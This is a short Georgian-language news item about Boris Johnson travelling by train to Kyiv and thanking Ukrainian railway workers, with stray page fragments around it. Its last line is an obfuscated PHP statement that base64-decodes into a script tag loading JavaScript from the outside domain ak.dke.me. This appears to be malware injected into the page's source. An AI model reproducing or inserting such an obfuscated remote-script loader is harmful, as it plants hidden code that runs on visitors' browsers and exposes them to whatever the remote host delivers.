celsiusi
ავერსი საქკაბელი
დიდი ბრიტანეთის პრემიერ-მინისტრი ბორის  ჯონსონი პოლონეთიდან კიევში მატარებლით ჩავიდა.
 
პრემიერმა მატარებლიდან სოციალურ ქსელში ვიდეოც გამოაქვეყნა.
 
„მე ვზივარ ფანტასტიკურ მატარებელში. უბრალოდ მინდა დიდი მადლობა გადაგიხადოთ რკინიგზის მთელ გუნდს - იმისთვის, რასაც აკეთებთ. გამიგია, რომ აქ "რკინის ბიჭებს" გეძახიან. ეს, რა თქმა უნდა, დაკავშირებულია თქვენს რკინიგზის ინდუსტრიასთან, მაგრამ ამავე დროს ის ასევე ასახავს თქვენს სულს, ნამდვილ უკრაინულ სულს, რომელსაც უკრაინელები აჩვენებენ. რუსეთის საშინელ აგრესიას წინააღმდეგობის გაწევას, მე ღრმად თანავუგრძნობ თქვენს დანაკარგებს და ჩემი ფიქრები კრამატორსკში დაშავებულ რკინიგზის მუშებს ეხება. მინდა იცოდეთ, რომ გაერთიანებული სამეფო თქვენს გვერდით დგას ამ ბრძოლაში!”,- თქვა ბორის ჯონსონმა. 
 
ცნობისთვის, 9 აპრილს, ბრიტანეთის პრემიერ-მინისტრი ეწვია კიევს, სადაც ვოლოდიმირ ზელენსკის შეხვდა. 
698
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");